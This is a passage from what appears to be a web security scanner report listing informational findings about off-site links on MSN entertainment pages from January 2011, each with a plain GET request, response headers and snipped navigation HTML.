<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406702&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FJesse-James-ex-arrested.aspx%3Fcp-documentid%3D27467016&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james%27+ex+wife+arrest&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>Police arrested Janine Lindemulder in Texas <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james%27+ex+wife+arrest&amp;go=&amp;form=msnpop">for harassing</a> her ex-husband, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james&amp;form=msnpop">Jesse James</a>... Lindemulder had multiple warrants out for her arrest (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=janine+lindemulder+warrants&amp;form=msnpop">how many?</a>
...[SNIP]...
<div>Lindemulder is currently <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=lindemulder+three+warrants+jail&amp;form=msnpop">behind bars</a>
...[SNIP]...
<div>Jesse James recently announced his <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james+engaged&amp;form=msnpop">plans to marry again</a>
...[SNIP]...
<div>See pics of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=kat+von+d&amp;qpvt=kat+von+d&amp;FORM=msnpop">the woman</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.310. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Entertainment/PETAs-newest-naked-celeb.aspx?cp-documentid=27450762 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:16 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a2c3e0298bf742cabd5f6e31537aa55a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=35384FB4CE3F41048B6FDBC4BF0BEC4A; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:16 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406696&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FPETAs-newest-naked-celeb.aspx%3Fcp-documentid%3D27450762&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA%92s+newest+naked+celeb&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>Oscar-nominated actress <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=taraji+p+henson&amp;FORM=msnpop">Taraji P. Henson</a> (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=taraji+p+henson&amp;form=msnpop">see photos</a>) has become the latest celebrity to strip for People for the Ethical Treatment of Animals (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA&amp;form=msnpop">PETA</a>
...[SNIP]...
<div>Henson was nominated for an Academy Award for <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=%22The+Curious+Case+of+Benjamin+Buttons%22&amp;form=msnpop">a movie</a>, which also starred Brad Pitt and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cate+Blanchett&amp;form=msnpop">Cate Blanchett</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/the-curious-case-of-benjamin-button-clip-like-everyone-else/5g9i2t4?q=%22The+Curious+Case+of+Benjamin+Button%22&amp;form=msnpop">Watch</a>
...[SNIP]...
<div>Find other <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA+celebrity+ads&amp;form=msnpop">PETA celebrity ads</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.311. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Entertainment/PETAs-newest-naked-celeb.aspx?cp-documentid=27450762 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=30c8de379ad14a979ac5931adc8cb918; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=57D504B387C74D618E739D5E9187758C; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:17 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345077&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FPETAs-newest-naked-celeb.aspx%3Fcp-documentid%3D27450762&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA%92s+newest+naked+celeb&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>Oscar-nominated actress <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=taraji+p+henson&amp;FORM=msnpop">Taraji P. Henson</a> (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=taraji+p+henson&amp;form=msnpop">see photos</a>) has become the latest celebrity to strip for People for the Ethical Treatment of Animals (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA&amp;form=msnpop">PETA</a>
...[SNIP]...
<div>Henson was nominated for an Academy Award for <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=%22The+Curious+Case+of+Benjamin+Buttons%22&amp;form=msnpop">a movie</a>, which also starred Brad Pitt and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cate+Blanchett&amp;form=msnpop">Cate Blanchett</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/the-curious-case-of-benjamin-button-clip-like-everyone-else/5g9i2t4?q=%22The+Curious+Case+of+Benjamin+Button%22&amp;form=msnpop">Watch</a>
...[SNIP]...
<div>Find other <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA+celebrity+ads&amp;form=msnpop">PETA celebrity ads</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.312. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Entertainment/Unlikely-celebrity-friendships.aspx?cp-documentid=27254149&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=eb6312f3f35042fbb36a3783d2971579; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=AB5CA1AD1FE849E6AD6241405BF5EE36; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 31981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345085&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FUnlikely-celebrity-friendships.aspx%3Fcp-documentid%3D27254149%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=unlikely+celebrity+friendships&amp;FORM=msnsea"><strong>
...[SNIP]...
<div>While most celebrity friendships seem like they were <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=oprah+winfrey+gayle+king&amp;form=msnsea">made for one another</a> others are <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mel+gibson+britney+spears+vacation&amp;form=msnsea">utterly unlikely</a>
...[SNIP]...
<div>Check out the following list of improbable celebrity pals and find out who <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jimmy+Fallon&amp;form=msnsea">Jimmy Fallon</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jon+Bon+Jovi&amp;form=msnsea">Jon Bon Jovi</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Snoop+Dogg&amp;form=msnsea">Snoop Dogg</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jennifer+Lopez+&amp;form=msnsea">Jennifer Lopez</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.313. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Entertainment/Unlikely-celebrity-friendships.aspx?cp-documentid=27254149&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=74bfb9b7b806414693934cf997542695; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8F7326ED4BB44C3B9E44677277454C73; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:30 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 31961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406710&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FUnlikely-celebrity-friendships.aspx%3Fcp-documentid%3D27254149%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=unlikely+celebrity+friendships&amp;FORM=msnsea"><strong>
...[SNIP]...
<div>While most celebrity friendships seem like they were <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=oprah+winfrey+gayle+king&amp;form=msnsea">made for one another</a> others are <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mel+gibson+britney+spears+vacation&amp;form=msnsea">utterly unlikely</a>
...[SNIP]...
<div>Check out the following list of improbable celebrity pals and find out who <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jimmy+Fallon&amp;form=msnsea">Jimmy Fallon</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jon+Bon+Jovi&amp;form=msnsea">Jon Bon Jovi</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Snoop+Dogg&amp;form=msnsea">Snoop Dogg</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jennifer+Lopez+&amp;form=msnsea">Jennifer Lopez</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.314. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Billionaires-caucus.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Billionaires-caucus.aspx?cp-documentid=27464338 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:05 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
